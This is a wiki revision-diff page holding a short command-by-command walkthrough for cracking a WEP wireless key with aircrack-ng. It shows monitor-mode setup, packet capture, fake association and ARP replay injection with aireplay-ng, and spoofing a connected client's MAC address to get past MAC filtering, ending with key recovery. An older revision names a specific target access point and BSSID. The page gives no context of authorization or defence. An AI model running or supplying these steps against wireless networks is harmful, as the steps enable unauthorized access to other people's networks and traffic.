Difference between revisions of "Cracking A WEP Key"

From Nearline Storage
Jump to navigation Jump to search
m
m
 
(3 intermediate revisions by the same user not shown)
Line 1: Line 1:
*Download aircrack-ng source
+
See http://www.aircrack-ng.org/doku.php?id=tutorial
  svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
 
*Change ~/src/aircrack-ng/common.mak:
 
  CFLAGS          ?= -g -W -Wall -Werror <b>-fno-strict-aliasing</b> -O3
 
*Compile and install:
 
  make && sudo make install
 
  
*Use kismet to get the channel (11), ESSid (crackme), and BSSid (00:18:4D:85:65:4F) for the access point to be cracked
+
*Install kismet, kismet-plugins and aircrack-ng packages
 +
*Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked
  
 
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits
 
These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits
Line 15: Line 11:
 
   airmon-ng start wlan0
 
   airmon-ng start wlan0
 
*Start capturing packets:
 
*Start capturing packets:
   airodump-ng -w dumpfile -c 11 -i mon0
+
   airodump-ng -w dumpfile --channel <channel> mon0
  
  
New terminal session:
+
If you don't get enough traffic from the access point on that channel. start a new terminal session:
 
*Associate with the target AP
 
*Associate with the target AP
   /usr/local/sbin/aireplay-ng -1 0 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0
+
   aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
  
 
If that doesn't associate successfully then it may be that they have MAC filtering turned on.  Observe the dump output for a while until you see a client associate successfully.  Take its MAC address and substitute that for -h.
 
If that doesn't associate successfully then it may be that they have MAC filtering turned on.  Observe the dump output for a while until you see a client associate successfully.  Take its MAC address and substitute that for -h.
  
 
*Start replaying packets so that we can collect more packets:  
 
*Start replaying packets so that we can collect more packets:  
   /usr/local/sbin/aireplay-ng -3 -e crackme -a 00:18:4D:85:65:4F -h 00:01:02:03:04:05 mon0
+
   aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0
  
 
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.
 
Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.
  
*Crack the key:  
+
*Ctrl-C the dump process and crack the key:
 
   aircrack-ng dumpfile.ivs
 
   aircrack-ng dumpfile.ivs
 +
 +
[[Category:Networking]]

Latest revision as of 15:37, 31 December 2019

See http://www.aircrack-ng.org/doku.php?id=tutorial

  • Install kismet, kismet-plugins and aircrack-ng packages
  • Use kismet to get the channel, ESSid, and BSSid for the access point to be cracked

These tools are fussy about the hex addresses, include leading zeros and don't use lower case hex digits

  • Become root:
 su -
  • Put NIC into monitor mode:
 airmon-ng start wlan0
  • Start capturing packets:
 airodump-ng -w dumpfile --channel <channel> mon0


If you don't get enough traffic from the access point on that channel. start a new terminal session:

  • Associate with the target AP
 aireplay-ng -1 0 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

If that doesn't associate successfully then it may be that they have MAC filtering turned on. Observe the dump output for a while until you see a client associate successfully. Take its MAC address and substitute that for -h.

  • Start replaying packets so that we can collect more packets:
 aireplay-ng -3 -e <ESSid> -a <BSSid> -h 00:01:02:03:04:05 mon0

Watch the Data column in the airodump-ng session, we want more than 100,000 unique IV headers.

  • Ctrl-C the dump process and crack the key:
 aircrack-ng dumpfile.ivs